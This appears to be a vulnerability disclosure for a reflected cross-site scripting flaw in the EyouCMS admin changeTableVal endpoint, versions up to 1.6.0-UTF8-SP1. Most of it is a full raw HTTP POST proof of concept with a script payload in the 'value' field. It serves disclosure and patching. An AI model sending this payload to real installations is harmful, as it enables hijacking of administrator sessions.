Description Backend article attribute type changing with reflected-XSS in the POST value value when the value contains non-integer char, this xss payload will be showed in error reporting message.
Affected Version EyouCMS <= 1.6.0-UTF8-SP1
POC 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /cms/eyoucms/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1 Host : 127.0.0.1:80Connection : closeUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept : application/json, text/javascript, */*; q=0.01Origin : http://127.0.0.1X-Requested-With : XMLHttpRequestReferer : http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=ArchivesFlag&a=index&lang=cnAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex; ENV_IS_UPHTML=0Content-Type : application/x-www-form-urlencodedContent-Length : 90value=%BA0 <script>alert(1)</script>&field =status&id_value =1&id_name =id&table =archives_flag
Reference
Reported by Srpopty, vulnerability discovered by using Corax.
/201610031-73f82844-05e0-4182-a275-028613c349bd.png)
/201617314-9974739a-12ef-4da5-9bbc-dc252941a50c.png)